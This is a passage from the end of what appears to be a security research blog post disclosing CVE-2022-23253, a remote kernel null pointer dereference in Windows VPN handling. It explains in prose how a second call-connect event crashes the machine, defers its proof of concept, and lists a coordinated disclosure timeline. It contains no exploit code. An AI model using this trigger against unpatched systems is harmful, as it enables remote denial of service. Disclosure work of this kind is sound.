        lpCallContext->CallParams = 0i64;
        ...

After a little bit of looking we can see the responsible sections of code. From reverse engineering the setup of the CallContext structure we know that the UnkownFlag structure variable is set to 1 by the handling of the IncomingCallRequest frame where the CallContext structure is initially allocated and setup. For our test case this code will always execute and thus the second call to CallEventCallInConnect will trigger a null pointer dereference and crash the machine in the NDIS layer, causing the appropriate Blue Screen Of Death to appear:

Proof Of Concept

We will release proof of concept code on May 2nd to allow extra time for systems administrators to patch.

Timeline

  • Vulnerability reported To Microsoft – 29 Oct 2021
  • Vulnerability acknowledged – 29 Oct 2021
  • Vulnerability confirmed – 11 Nov 2021
  • Patch release date confirmed – 18 Jan 2022
  • Patch released – 08 March 2022
  • Blog released – 22 March 2022

The post CVE-2022-23253 – Windows VPN Remote Kernel Null Pointer Dereference appeared first on Nettitude Labs.

❌
❌